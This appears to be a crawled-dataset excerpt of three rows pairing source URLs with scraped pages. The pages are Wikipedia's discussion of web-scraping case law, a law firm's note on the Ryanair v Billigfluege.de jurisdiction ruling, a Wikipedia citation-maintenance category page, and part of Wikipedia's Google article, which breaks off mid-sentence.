legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
158 | https://en.wikipedia.org/wiki/Web_scraping | https://web.archive.org/web/20120624103316/http://www.lkshields.ie/htmdocs/publications/newsletters/update26/update26_03.htm | Update Our Reputation Banking and Financial Services Business Commercial Property Company Secretarial and Compliance Employment and Industrial Relations EU, Competition and Regulated Markets Family Law Gaming and Gambling Intellectual Property and Technology Litigation and Dispute Resolution Pensions and Benefits Public Procurement Website owners often have to contend with the activities of third-party 'screen-scrapers', who use 'web harvesting' software to extract information from companies' websites. But website owners are now in a stronger position thanks to a recent decision by Mr Justice Michael Hanna in the High Court in the case of Ryanair Limited v Billigfluege.de GmbH (26 February 2010). However, it should be noted that the decision is currently under appeal to the Surpeme Court. The Ryanair case concerned a claim by Ryanair that the service offered by the Billigfluege website breached the terms of use and trade mark, copyright and database rights of Ryanair's own website. Billigfluege operates a price comparison website that allows users of its website to compare prices of flights. In order to provide this service, Billigfluege takes information from Ryanair's website (without Ryanair's consent), an activity known as 'screen-scraping', and provides that information to its users for a fee. Mr Justice Hanna's decision relates only to a preliminary issue as to whether the case should be heard in Ireland or Germany. It is not a full decision on the allegation of screen- scraping or the other issues that are before the court. In any dispute, there is an initial issue that must always be determined: where should a defendant be sued? Billigfluege, a German-based company, argued that it was not appropriate that proceedings be brought in Ireland and that proceedings should instead be brought in Germany. Ryanair claimed that by Billigfluege entering the Ryanair website and extracting content from that website, it agreed to be bound by Ryanair's terms of use which contained a provision that Irish courts had exclusive jurisdiction over all disputes. Billigfluege denied that there was any contract in existence between it and Ryanair. The court had to decide the issue. The court noted that it was a well-established general principle of law that parties to a contract cannot be bound by terms that they have not had the opportunity of reading prior to making the contract. But it added that this doesn't mean that a party will not be bound because it has not read the terms. In the Ryanair case, the exclusive jurisdiction clause of Ireland was contained in the terms of use on Ryanair's website, highlighted by way of a hyperlink. The court found that the terms of use on Ryanair's website were fairly brought to the attention of the other party and it ruled in favour of Ryanair that the exclusive jurisdiction clause was binding on Billigfluege. Billigfluege also argued that, regardless of the validity of the terms of use, it did not use Ryanair's website; rather, its customers did. The court held that Billigfluege is a commercial entity which engaged with the Ryanair website for the purposes of gleaning or scraping information from it for onward transmission to its own customers. The court said that to claim this is not 'use' of the Ryanair website was an exercise in semantics and an unconvincing argument. The court will now hear the full case and determine whether Billigfluege infringed Ryanair's intellectual property rights and or breached its terms of use as a result of the alleged screen-scraping activity. The main point to take from this decision is that if you are a website owner and you wish to prevent your content being misappropriated by third parties, whether you are an airline operator, a job recruitment website or operating any other form of online sales activity, it is imperative that your terms of use be comprehensive and up-to-date to ensure that you are appropriately protected. The terms of use must be fairly brought to the attention of the other party, meaning that the terms must be brought to the customer's attention in such a manner that they are incorporated into the contract. We recommend that your terms of use be reviewed periodically and the manner in which they are displayed on your website be reviewed to ensure that your business is protected. For further information please contact ine Matthews. |
159 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Category:CS1_maint:_multiple_names:_authors_list | This is a hidden tracking category for CS1 citations that use author , or its aliases where Module:Citation CS1 identifies cs1 2 citation templates that appear to use singular forms of author name-list parameters to list multiple authors' names. Doing so corrupts the citation's metadata. The citation module code looks for multiple comma or semicolon separator characters in the value assigned to author , last , their aliases, and enumerated equivalents (e.g. author2 , last2 , etc.). This test displays an error message for multiple authors' names in a single parameter, as well as single author names that include a comma-separated list of post-nominals: author FC White, RN, MD, Ph.D. To fix these errors in citations: Editors should not simply replace author with authors . Using the plural authors parameter to replace a singular author or last parameter that holds multiple authors' names is discouraged because automatically decoding lists of human names is an extraordinarily difficult task. Because of this difficulty, names listed in authors are omitted from the template's COinS metadata. Enumerating the author list with authorn , or lastn firstn , or, where appropriate, vauthors , preserves the associated metadata. Pages in this category should only be added by Module:Citation CS1. Pages with this condition are automatically placed in Category:CS1 maint: multiple names: authors list. a By default, Citation Style 1 and Citation Style 2 error messages are visible to all readers and maintenance messages are hidden from all readers. To display maintenance messages in the rendered article, include the following text in your common CSS page (common.css) or your specific skin's CSS page and (skin.css). (Note to new editors: those CSS pages are specific to you, and control your view of pages, by adding to your user account's CSS code. If you have not yet created such a page, then clicking one of the .css links above will yield a page that starts "Wikipedia does not have a user page with this exact name. Click the "Start the User:username filename page" link, paste the text below, save the page, follow the instructions at the bottom of the new page on bypassing your browser's cache, and finally, in order to see the previously hidden maintenance messages, refresh the page you were editing earlier.) To display hidden-by-default error messages: Even with this CSS installed, older pages in Wikipedia's cache may not have been updated to show these error messages even though the page is listed in one of the tracking categories. A null edit will resolve that issue. After (error and maintenance) messages are displayed, it might still not be easy to find them in a large article with a lot of citations. Messages can then be found by searching (with Ctrl-F) for (help) or "cs1". To hide normally-displayed error messages: You can personalize the display of these messages (such as changing the color), but you will need to ask someone who knows CSS or at the technical village pump if you do not understand how. Nota bene: these CSS rules are not obeyed by Navigation popups. They also do not hide script warning messages in the Preview box that begin with "This is only a preview; your changes have not yet been saved". The following 200 pages are in this category, out of approximately 73,350 total. This list may not reflect recent changes. This category contains only the following file. |
160 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Google | Google LLC ( u l GOO-gh l) is an American multinational corporation and technology company focusing on online advertising, search engine technology, cloud computing, computer software, quantum computing, e-commerce, consumer electronics, and artificial intelligence (AI). 9 It has been referred to as "the most powerful company in the world" 10 and is one of the world's most valuable brands due to its market dominance, data collection, and technological advantages in the field of AI. 11 12 13 Google's parent company, Alphabet Inc., is one of the five Big Tech companies, alongside Amazon, Apple, Meta, and Microsoft. Google was founded on September 4, 1998, by American computer scientists Larry Page and Sergey Brin while they were PhD students at Stanford University in California. Together, they own about 14% of its publicly listed shares and control 56% of its stockholder voting power through super-voting stock. The company went public via an initial public offering (IPO) in 2004. In 2015, Google was reorganized as a wholly owned subsidiary of Alphabet Inc. Google is Alphabet's largest subsidiary and is a holding company for Alphabet's internet properties and interests. Sundar Pichai was appointed CEO of Google on October 24, 2015, replacing Larry Page, who became the CEO of Alphabet. On December 3, 2019, Pichai also became the CEO of Alphabet. 14 The company has since rapidly grown to offer a multitude of products and services beyond Google Search, many of which hold dominant market positions. These products address a wide range of use cases, including email (Gmail), navigation (Waze Maps), cloud computing (Cloud), web navigation (Chrome), video sharing (YouTube), productivity (Workspace), operating systems (Android), cloud storage (Drive), language translation (Translate), photo storage (Photos), videotelephony (Meet), smart home (Nest), smartphones (Pixel), wearable technology (Pixel Watch Fitbit), music streaming (YouTube Music), video on demand (YouTube TV), AI (Google Assistant Gemini), machine learning APIs (TensorFlow), AI chips (TPU), and more. Discontinued Google products include gaming (Stadia), Glass, Google , Reader, Play Music, Nexus, Hangouts, and Inbox by Gmail. 15 16 Google's other ventures outside of internet services and consumer electronics include quantum computing (Sycamore), self-driving cars (Waymo, formerly the Google Self-Driving Car Project), smart cities (Sidewalk Labs), and transformer models (Google DeepMind). 17 Google and YouTube are the two most-visited websites worldwide followed by Facebook and X (formerly known as Twitter). Google is also the largest search engine, mapping and navigation application, email provider, office suite, online video platform, photo and cloud storage provider, mobile operating system, web browser, machine learning framework, and AI virtual assistant provider in the world as measured by market share. 18 On the list of most valuable brands, Google is ranked second by Forbes 19 and fourth by Interbrand. 20 It has received significant criticism involving issues such as privacy concerns, tax avoidance, censorship, search neutrality, antitrust and abuse of its monopoly position. On August 5, 2024, D.C. Circuit Court Judge Amit P. Mehta ruled that Google held an illegal monopoly over Internet search. 21 Google began in January 1996 as a research project by Larry Page and Sergey Brin while they were both PhD students at Stanford University in California. 22 23 24 The project initially involved an unofficial "third founder", Scott Hassan, the original lead programmer who wrote much of the code for the original Google Search engine, but he left before Google was officially founded as a company; 25 26 Hassan went on to pursue a career in robotics and founded the company Willow Garage in 2006. 27 28 While conventional search engines ranked results by counting how many times the search terms appeared on the page, they theorized about a better system that analyzed the relationships among websites. 29 They called this algorithm PageRank; it determined a website's relevance by the number of pages, and the importance of those pages that linked back to the original site. 30 31 Page told his ideas to Hassan, who began writing the code to implement Page's ideas. 25 Page and Brin would also use their friend Susan Wojcicki's garage as their office when the search engine was set up in 1998. 32 Page and Brin originally nicknamed the new search engine "BackRub", because the system checked backlinks to estimate the importance of a site. 22 33 34 Hassan as well as Alan Steremberg were cited by Page and Brin as being critical to the development of Google. Rajeev Motwani and Terry Winograd later co-authored with Page and Brin the first paper about the project, describing PageRank and the initial prototype of the Google search engine, published in 1998. H ctor Garc a-Molina and Jeffrey Ullman were also cited as contributors to the project. 35 PageRank was influenced by a similar page-ranking and site-scoring algorithm earlier used for RankDex, developed by Robin Li in 1996, with Larry Page's PageRank patent including a citation to Li's earlier RankDex patent; Li later went on to create the Chinese search engine Baidu. 36 37 Eventually, they changed the name to Google; the name of the search engine was a misspelling of the word googol, 22 38 39 a very large number written 10100 (1 followed by 100 zeros), picked to signify that the search engine was intended to provide large quantities of information. 40 Google was initially funded by an August 1998 investment of $100,000 from Andy Bechtolsheim, 22 co-founder of Sun Microsystems. This initial investment served as a motivation to incorporate the company to be able to use the funds. 42 43 Page and Brin initially approached David Cheriton for advice because he had a nearby office in Stanford, and they knew he had startup experience, having recently sold the company he co-founded, Granite Systems, to Cisco for $220 million. David arranged a meeting with Page and Brin and his Granite co-founder Andy Bechtolsheim. The meeting was set for 8 a.m. at the front porch of David's home in Palo Alto and it had to be brief because Andy had another meeting at Cisco, where he now worked after the acquisition, at 9 a.m. Andy briefly tested a demo of the website, liked what he saw, and then went back to his car to grab the check. David Cheriton later also joined in with a $250,000 investment. 44 45 Google received money from two other angel investors in 1998: Amazon.com founder Jeff Bezos, and entrepreneur Ram Shriram. 46 Page and Brin had first approached Shriram, who was a venture capitalist, for funding and counsel, and Shriram invested $250,000 in Google in February 1998. Shriram knew Bezos because Amazon had acquired Junglee, at which Shriram was the president. It was Shriram who told Bezos about Google. Bezos asked Shriram to meet Google's founders and they met six months after Shriram had made his investment when Bezos and his wife were on a vacation trip to the Bay Area. Google's initial funding round had already formally closed but Bezos' status as CEO of Amazon was enough to persuade Page and Brin to extend the round and accept his investment. 47 48 Between these initial investors, friends, and family Google raised around $1,000,000, which is what allowed them to open up their original shop in Menlo Park, California. 49 Craig Silverstein, a fellow PhD student at Stanford, was hired as the first employee. 24 50 51 After some additional, small investments through the end of 1998 to early 1999, 46 a new $25 million round of funding was announced on June 7, 1999, 52 with major investors including the venture capital firms Kleiner Perkins and Sequoia Capital. 43 Both firms were initially reticent about investing jointly in Google, as each wanted to retain a larger percentage of control over the company to themselves. Larry and Sergey however insisted on taking investments from both. Both venture companies finally agreed to investing jointly $12.5 million each due to their belief in Google's great potential and through the mediation of earlier angel investors Ron Conway and Ram Shriram who had contacts in the venture companies. 53 In March 1999, the company moved its offices to Palo Alto, California, 54 which is home to several prominent Silicon Valley technology start-ups. 55 The next year, Google began selling advertisements associated with search keywords against Page and Brin's initial opposition toward an advertising-funded search engine. 56 24 To maintain an uncluttered page design, advertisements were solely text-based. 57 In June 2000, it was announced that Google would become the default search engine provider for Yahoo , one of the most popular websites at the time, replacing Inktomi. 58 59 In 2003, after outgrowing two other locations, the company leased an office complex from Silicon Graphics, at 1600 Amphitheatre Parkway in Mountain View, California. 61 The complex became known as the Googleplex, a play on the word googolplex, the number one followed by a googol of zeroes. Three years later, Google bought the property from SGI for $319 million. 62 By that time, the name "Google" had found its way into everyday language, causing the verb "google" to be added to the Merriam-Webster Collegiate Dictionary and the Oxford English Dictionary, denoted as: "to use the Google search engine to obtain information on the Internet". 63 64 The first use of the verb on television appeared in an October 2002 episode of Buffy the Vampire Slayer. 65 Additionally, in 2001 Google's investors felt the need to have a strong internal management, and they agreed to hire Eric Schmidt as the chairman and CEO of Google. 49 Eric was proposed by John Doerr from Kleiner Perkins. He had been trying to find a CEO that Sergey and Larry would accept for several months, but they rejected several candidates because they wanted to retain control over the company. Michael Moritz from Sequoia Capital at one point even menaced requesting Google to immediately pay back Sequoia's $12.5m investment if they did not fulfill their promise to hire a chief executive officer, which had been made verbally during investment negotiations. Eric was not initially enthusiastic about joining Google either, as the company's full potential had not yet been widely recognized at the time, and as he was occupied with his responsibilities at Novell where he was CEO. As part of him joining, Eric agreed to buy $1 million of Google preferred stocks as a way to show his commitment and to provide funds Google needed. 66 On August 19, 2004, Google became a public company via an initial public offering. At that time Page, Brin and Schmidt agreed to work together at Google for 20 years, until the year 2024. 67 The company offered 19,605,052 shares at a price of $85 per share. 68 69 Shares were sold in an online auction format using a system built by Morgan Stanley and Credit Suisse, underwriters for the deal. 70 71 The sale of $1.67 billion gave Google a market capitalization of more than $23 billion. 72 On November 13, 2006, Google acquired YouTube for $1.65 billion in Google stock, 73 74 75 76 On July 20, 2007, Google bids $4.6 billion for the wireless-spectrum auction by the FCC. 77 On March 11, 2008, Google acquired DoubleClick for $3.1 billion, transferring to Google valuable relationships that DoubleClick had with Web publishers and advertising agencies. 78 79 By 2011, Google was handling approximately 3 billion searches per day. To handle this workload, Google built 11 data centers around the world with several thousand servers in each. These data centers allowed Google to handle the ever-changing workload more efficiently. 49 In May 2011, the number of monthly unique visitors to Google surpassed one billion for the first time. 80 81 In May 2012, Google acquired Motorola Mobility for $12.5 billion, in its largest acquisition to date. 82 83 84 This purchase was made in part to help Google gain Motorola's considerable patent portfolio on mobile phones and wireless technologies, to help protect Google in its ongoing patent disputes with other companies, 85 mainly Apple and Microsoft, 86 and to allow it to continue to freely offer Android. 87 In June 2013, Google acquired Waze for $966 million. 88 While Waze would remain an independent entity, its social features, such as its crowdsourced location platform, were reportedly valuable integrations between Waze and Google Maps, Google's own mapping service. 89 Google announced the launch of a new company, called Calico, on September 19, 2013, to be led by Apple Inc. chairman Arthur Levinson. In the official public statement, Page explained that the "health and well-being" company would focus on "the challenge of ageing and associated diseases". 90 On January 26, 2014, Google announced it had agreed to acquire DeepMind Technologies, a privately held artificial intelligence company from London. 91 Technology news website Recode reported that the company was purchased for $400 million, yet the source of the information was not disclosed. A Google spokesperson declined to comment on the price. 92 93 The purchase of DeepMind aids in Google's recent growth in the artificial intelligence and robotics community. 94 In 2015, DeepMind's AlphaGo became the first computer program to defeat a top human pro at the game of Go. According to Interbrand's annual Best Global Brands report, Google has been the second most valuable brand in the world (behind Apple Inc.) in 2013, 95 2014, 96 2015, 97 and 2016, with a valuation of $133 billion. 98 On August 10, 2015, Google announced plans to reorganize its various interests as a conglomerate named Alphabet Inc. Google became Alphabet's largest subsidiary and the umbrella company for Alphabet's Internet interests. Upon completion of the restructuring, Sundar Pichai became CEO of Google, replacing Larry Page, who became CEO of Alphabet. 99 100 101 On August 8, 2017, Google fired employee James Damore after he distributed a memo throughout the company that argued bias and "Google's Ideological Echo Chamber" clouded their thinking about diversity and inclusion, and that it is also biological factors, not discrimination alone, that cause the average woman to be less interested than men in technical positions. 102 Google CEO Sundar Pichai accused Damore of violating company policy by "advancing harmful gender stereotypes in our workplace", and he was fired on the same day. 103 104 105 Between 2018 and 2019, tensions between the company's leadership and its workers escalated as staff protested company decisions on internal sexual harassment, Dragonfly, a censored Chinese search engine, and Project Maven, a military drone artificial intelligence, which had been seen as areas of revenue growth for the company. 106 107 On October 25, 2018, The New York Times published the expos , "How Google Protected Andy Rubin, the 'Father of Android' . The company subsequently announced that "48 employees have been fired over the last two years" for sexual misconduct. 108 On November 1, 2018, more than 20,000 Google employees and contractors staged a global walk-out to protest the company's handling of sexual harassment complaints. 109 110 CEO Sundar Pichai was reported to be in support of the protests. 111 Later in 2019, some workers accused the company of retaliating against internal activists. 107 On March 19, 2019, Google announced that it would enter the video game market, launching a cloud gaming platform called Google Stadia. 112 On June 3, 2019, the United States Department of Justice reported that it would investigate Google for antitrust violations. 113 This led to the filing of an antitrust lawsuit in October 2020, on the grounds the company had abused a monopoly position in the search and search advertising markets. 114 In December 2019, former PayPal chief operating officer Bill Ready became Google's new commerce chief. Ready's role will not be directly involved with Google Pay. 115 In April 2020, due to the COVID 19 pandemic, Google announced several cost-cutting measures. Such measures included slowing down hiring for the remainder of 2020, except for a small number of strategic areas, recalibrating the focus and pace of investments in areas like data centers and machines, and non-business essential marketing and travel. 116 Most employees were also working from home due to the COVID 19 pandemic and the success of it even led to Google announcing that they would be permanently converting some of their jobs to work from home 117 The 2020 Google services outages disrupted Google services: one in August that affected Google Drive among others, another in November affecting YouTube, and a third in December affecting the entire suite of Google applications. All three outages were resolved within hours. 118 119 120 In 2021, the Alphabet Workers Union was founded, composed mostly of Google employees. 121 In January 2021, the Australian Government proposed legislation that would require Google and Facebook to pay media companies for the right to use their content. In response, Google threatened to close off access to its search engine in Australia. 122 In March 2021, Google reportedly paid $20 million for Ubisoft ports on Google Stadia. 123 Google spent "tens of millions of dollars" on getting major publishers such as Ubisoft and Take-Two to bring some of their biggest games to Stadia. 124 In April 2021, The Wall Street Journal reported that Google ran a years-long program called "Project Bernanke" that used data from past advertising bids to gain an advantage over competing for ad services. This was revealed in documents concerning the antitrust lawsuit filed by ten US states against Google in December. 125 In September 2021, the Australian government announced plans to curb Google's capability to sell targeted ads, claiming that the company has a monopoly on the market harming publishers, advertisers, and consumers. 126 In 2022, Google began accepting requests for the removal of phone numbers, physical addresses and email addresses from its search results. It had previously accepted requests for removing confidential data only, such as Social Security numbers, bank account and credit card numbers, personal signatures, and medical records. Even with the new policy, Google may remove information from only certain but not all search queries. It would not remove content that is "broadly useful", such as news articles, or already part of the public record. 127 In May 2022, Google announced that the company had acquired California based, MicroLED display technology development and manufacturing Start-up Raxium. Raxium is set to join Google's Devices and Services team to aid in the development of micro-optics, monolithic integration, and system integration. 128 129 In early 2023, following the success of ChatGPT and concerns that Google was falling behind in the AI race, Google's senior management issued a "code red" and a "directive that all of its most important products—those with more than a billion users—must incorporate generative AI within months". 130 In early May 2023, Google announced its plans to build two additional data centers in Ohio. These centers, which will be built in Columbus and Lancaster, will power up the company's tools, including AI technology. The said data hub will add to the already operational center near Columbus, bringing Google's total investment in Ohio to over $2 billion. 131 In August 2024, Google would lose a lawsuit which started in 2020 in lower court, as it was found that the company had an illegal monopoly over Internet search. 132 D.C. Circuit Court Judge Amit Mehta held that this monopoly was in violation of Section 2 of the Sherman Act. 133 Google indexes billions of web pages to allow users to search for the information they desire through the use of keywords and operators. 134 According to comScore market research from November 2009, Google Search is the dominant search engine in the United States market, with a market share of 65.6%. 135 In May 2017, Google enabled a new "Personal" tab in Google Search, letting users search for content in their Google accounts' various services, including email messages from Gmail and photos from Google Photos. 136 137 Google launched its Google News service in 2002, an automated service which summarizes news articles from various websites. 138 Google also hosts Google Books, a service which searches the text found in books in its database and shows limited previews or and the full book where allowed. 139 Google expanded its search services to include shopping (launched originally as Froogle in 2002), 140 finance (launched 2006), 141 and flights (launched 2011). 142 Google generates most of its revenues from advertising. This includes sales of apps, purchases made in-app, digital content products on Google and YouTube, Android and licensing and service fees, including fees received for Google Cloud offerings. Forty-six percent of this profit was from clicks (cost per clicks), amounting to US$109,652 million in 2017. This includes three principal methods, namely AdMob, AdSense (such as AdSense for Content, AdSense for Search, etc.) and DoubleClick AdExchange. 143 In addition to its own algorithms for understanding search requests, Google uses technology from its acquisition of DoubleClick, to project user interest and target advertising to the search context and the user history. 144 145 In 2007, Google launched "AdSense for Mobile", taking advantage of the emerging mobile advertising market. 146 Google Analytics allows website owners to track where and how people use their website, for example by examining click rates for all the links on a page. 147 Google advertisements can be placed on third-party websites in a two-part program. Google Ads allows advertisers to display their advertisements in the Google content network, through a cost-per-click scheme. 148 The sister service, Google AdSense, allows website owners to display these advertisements on their website and earn money every time ads are clicked. 149 One of the criticisms of this program is the possibility of click fraud, which occurs when a person or automated script clicks on advertisements without being interested in the product, causing the advertiser to pay money to Google unduly. Industry reports in 2006 claimed that approximately 14 to 20 percent of clicks were fraudulent or invalid. 150 Google Search Console (rebranded from Google Webmaster Tools in May 2015) allows webmasters to check the sitemap, crawl rate, and for security issues of their websites, as well as optimize their website's visibility. Google had previously utilized virtual assistants and chatbots, such as Google Bard, prior to the announcement of Gemini in March 2024. None of them, however, had been seen as legitimate competitors to ChatGPT, unlike Gemini. 151 An artificial intelligence training program for Google employees was also introduced in April 2024. 152 Google offers Gmail for email, 153 Google Calendar for time-management and scheduling, 154 Google Maps for mapping, navigation and satellite imagery, 155 Google Drive for cloud storage of files, 156 Google Docs, Sheets and Slides for productivity, 156 Google Photos for photo storage and sharing, 157 Google Keep for note-taking, 158 Google Translate for language translation, 159 YouTube for video viewing and sharing, 160 Google My Business for managing public business information, 161 and Duo for social interaction. 162 In March 2019, Google unveiled a cloud gaming service named Stadia. 112 A job search product has also existed since before 2017, 163 164 165 Google for Jobs is an enhanced search feature that aggregates listings from job boards and career sites. 166 Some Google services are not web-based. Google Earth, launched in 2005, allows users to see high-definition satellite pictures from all over the world for free through a client software downloaded to their computers. 167 Google develops the Android mobile operating system, 168 as well as its smartwatch, 169 television, 170 car, 171 and Internet of things-enabled smart devices variations. 172 It also develops the Google Chrome web browser, 173 and ChromeOS, an operating system based on Chrome. 174 In January 2010, Google released Nexus One, the first Android phone under its own brand. 175 It spawned a number of phones and tablets under the "Nexus" branding 176 until its eventual discontinuation in 2016, replaced by a new brand called Pixel. 177 In 2011, the Chromebook was introduced, which runs on ChromeOS. 178 In July 2013, Google introduced the Chromecast dongle, which allows users to stream content from their smartphones to televisions. 179 180 In June 2014, Google announced Google Cardboard, a simple cardboard viewer that lets the user place their smartphone in a special front compartment to view virtual reality (VR) media. 181 In October 2016, Google announced Daydream View, a lightweight VR viewer which lets the user place their smartphone in the front hinge to view VR media. 182 183 Other hardware products include: Google Workspace (formerly G Suite until October 2020 186 ) is a monthly subscription offering for organizations and businesses to get access to a collection of Google's services, including Gmail, Google Drive and Google Docs, Google Sheets and Google Slides, with additional administrative tools, unique domain names, and 24 7 support. 187 On September 24, 2012, 188 Google launched Google for Entrepreneurs, a largely not-for-profit business incubator providing startups with co-working spaces known as Campuses, with assistance to startup founders that may include workshops, conferences, and mentorships. 189 Presently, there are seven Campus locations: Berlin, London, Madrid, Seoul, S o Paulo, Tel Aviv, and Warsaw. On March 15, 2016, Google announced the introduction of Google Analytics 360 Suite, "a set of integrated data and marketing analytics products, designed specifically for the needs of enterprise-class marketers" which can be integrated with BigQuery on the Google Cloud Platform. Among other things, the suite is designed to help "enterprise class marketers" "see the complete customer journey", generate "useful insights", and "deliver engaging experiences to the right people". 190 Jack Marshall of The Wall Street Journal wrote that the suite competes with existing marketing cloud offerings by companies including Adobe, Oracle, Salesforce, and IBM. 191 In February 2010, Google announced the Google Fiber project, with experimental plans to build an ultra-high-speed broadband network for 50,000 to 500,000 customers in one or more American cities. 192 193 Following Google's corporate restructure to make Alphabet Inc. its parent company, Google Fiber was moved to Alphabet's Access division. 194 195 In April 2015, Google announced Project Fi, a mobile virtual network operator, that combines Wi-Fi and cellular networks from different telecommunication providers in an effort to enable seamless connectivity and fast Internet signal. 196 197 In August 2023, Google became the first major tech company to join the OpenWallet Foundation, launched earlier in the year, whose goal was creating open-source software for interoperable digital wallets. 198 Google's initial public offering (IPO) took place on August 19, 2004. At IPO, the company offered 19,605,052 shares at a price of $85 per share. 68 69 The sale of $1.67 billion gave Google a market capitalization of more than $23 billion. 72 The stock performed well after the IPO, with shares hitting $350 for the first time on October 31, 2007, 199 primarily because of strong sales and earnings in the online advertising market. 200 The surge in stock price was fueled mainly by individual investors, as opposed to large institutional investors and mutual funds. 200 GOOG shares split into GOOG class C shares and GOOGL class A shares. 201 The company is listed on the NASDAQ stock exchange under the ticker symbols GOOGL and GOOG, and on the Frankfurt Stock Exchange under the ticker symbol GGQ1. These ticker symbols now refer to Alphabet Inc., Google's holding company, since the fourth quarter of 2015. update 202 In the third quarter of 2005, Google reported a 700% increase in profit, largely due to large companies shifting their advertising strategies from newspapers, magazines, and television to the Internet. 203 204 205 For the 2006 fiscal year, the 